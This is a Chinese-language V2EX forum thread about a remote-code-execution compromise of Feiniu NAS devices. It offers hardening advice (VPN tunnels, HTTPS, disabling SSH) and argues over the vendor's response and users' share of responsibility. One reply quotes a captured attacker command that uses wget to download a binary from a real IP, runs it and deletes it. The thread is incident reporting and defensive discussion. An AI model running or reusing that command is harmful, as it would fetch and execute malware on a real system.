公网使用飞牛 nas 的一些安全使用小提示--感谢飞牛官方团队

1 月 30 日
 lyz2754509784
首先感谢飞牛官方的技术人员凌晨 2 点还在协助解决安全问题,用爱发电,真的很辛苦!!再次感谢
先说我的 nas 出现的问题:大约一周前不定时爆连接数指向一个 ip ,疑似被黑成肉鸡攻击某个站点
在群里讨论后客服积极的拉了技术群并安排了技术人员分析,由于攻击是随机时间的不好抓取,今晚 9 点正好复现,凌晨 2 点飞牛的技术人员完成了安全问题的解决。
在此也给公网使用飞牛的朋友们一些安全小意见以减少 nas 被入侵的安全风险:
web 不建议直接映射,建议使用 tailscale 等类似的组网隧道,最最安全!
如果一定要公网开放 web ,不建议使用 5666 http 的明文端口,安全人员反馈我收到的就是疑似中间人攻击,问题源自于 5666 的明文 http 注入。
建议使用 5667 的 https 端口,开启 https 强制跳转,同时签名证书来保证安全
ssh 建议是在不调整 nas 时关闭,减少风险
使用强密码,不执行不开源的来源不明的脚本。
再次感谢飞牛官方团队的技术支持,凌晨 2 点技术在线解决问题说实话真的让我很惊讶,再次感谢,也希望我的遭遇可以让其他有相同问题的朋友们可以参考
21924 次点击
所在节点    NAS
111 条回复
fuchaofather
1 月 31 日
@pmgh10 哈哈哈哈,确实
asuraa
1 月 31 日
楼上各位,不要着急。今晚更新 1.1.18 彻底修复
naoki66
1 月 31 日
@asuraa 我已经是 1.1.18 内测了 一样是被挂了🐎的 哎
YsHaNg
1 月 31 日
@dilidilid 一个商业公司非法运营的产品 这一个前置条件就足矣
JJBOOM
1 月 31 日
目前:
python35
1 月 31 日
内网中部署了两台,1.15 和 1.11 版本,其中 1.11 版本复现,好在都没开 FN connect ,因此都没中招
intsilence
1 月 31 日
气死我了,什么破系统,水平太差了!

今天网络特别卡,查监控发现有异常 ip 连接,抓到“sh -c cd /tmp;rm -rf bkd2;wget http://151.240.13.91/bkd2;chmod +x bkd2;./bkd2;rm -rf bkd2” 这条命令,意识到 nas 肯定有问题,一直在反思自己哪里权限不对,哪里有弱密码,原来是这么大的 0day 漏洞!
thereone
1 月 31 日
上了雷池 waf 没见有什么异常的,开了限制地区访问限制必须要用账号才能访问网页。目前 WAF 除了特定地区 IP 根本就没办法打开认证页面。安全基本拉满了。不是很懂随意做端口转发还不上安全防护的,基本当了肉鸡都会不知道。
MiKing233
1 月 31 日
@thereone #88 你这种指责毫无根据, 系统的漏洞怎么就怪上用户了, 按你这么说用户没有公网 IP 没有端口转发, 用飞牛官方的 FN Connect 一样被漏洞利用, 你怎么解释呢请问?
Joming
1 月 31 日
飞牛官方毫无担当,还不明白漏洞的严重性!现在都还没发布重要公告!
thereone
1 月 31 日
@MiKing233 那就不用啊或者加固,能公网访问的服务基本都有被攻击的可能官方的也一样。所以要上 VPN 访问或者安全防护的手段进行防护,裸奔是都有中招的可能。对于安全自己要有意识要上手段这样才能尽可能的减少出问题的几率。
Untu
1 月 31 日
@intsilence 最大的问题是不应该映射出去,用任何服务都是这样,这些 Web 服务指望没有漏洞不太可能的
MiKing233
1 月 31 日
@thereone 你要不听听自己在说什么? 按你这逻辑发生任何因厂商自身配置错误或是漏洞导致的安全事件, 都怪用户自己联网了? 你自己有公网配置端口转发需要为你自己的安全负责, 但我请问用厂商 OS 上自带的网路服务一样出问题, 最后还是怪用户自己? 这服务不少人还是付费使用的, 意思大家花钱开门找打? 你到底搞清楚问题没有?
qianxuu
1 月 31 日
@Untu 飞牛现在的问题是,不映射出去也可以被攻击,开了官方的 FN Connect 也会中招
thereone
2 月 1 日
@MiKing233 厂商自己的问题是一回事,你自己注不注重安全又是一回事。既然无法保证厂商完全没有问题那就自己要想办法做好安全防护啊。我又没有说飞牛没问题我核心点就是 你自己要做好安全措施对自己的安全要上心不然出事了受到损失不还是你自己的。就说这么多了。
Untu
2 月 1 日
@qianxuu @thereone 我自己的和单位里面的服务器都是不能直接连外网的,通过 VPN 对外发布访问,这种黑箱在线服务反正我不敢用。肥牛最不该的就是没打预防针
unusualcat
2 月 1 日
让你们用,福报来了。。。
thereone
2 月 1 日
@Untu 是的了解安全都知道要做防护的。公司现在全部都用零信任客户端接入不合规的终端不给连包括内网和外网。对外的服务上云的都上买了安全服务,本地的也买了安全设备做防护有 CVE 漏洞都会发邮件让业务侧的检查和处理。
我个人家里用的都是 VPN 接入,实在要对外的上了雷池 WAF 和安全认证还有定时开启和关闭端口转发。尽量减少被攻击的可能。
Tink
2 月 1 日
跟 http 没关系,https 一样被搞,和中间人也没关系,就是代码的锅
Starainrt
2 月 1 日
我根本没有登录,直接 copy 上面 websocket 的 poc 就能 rce ,好像是加了某个 header 就行……

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://v2ex.ih06.com/t/1189392

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX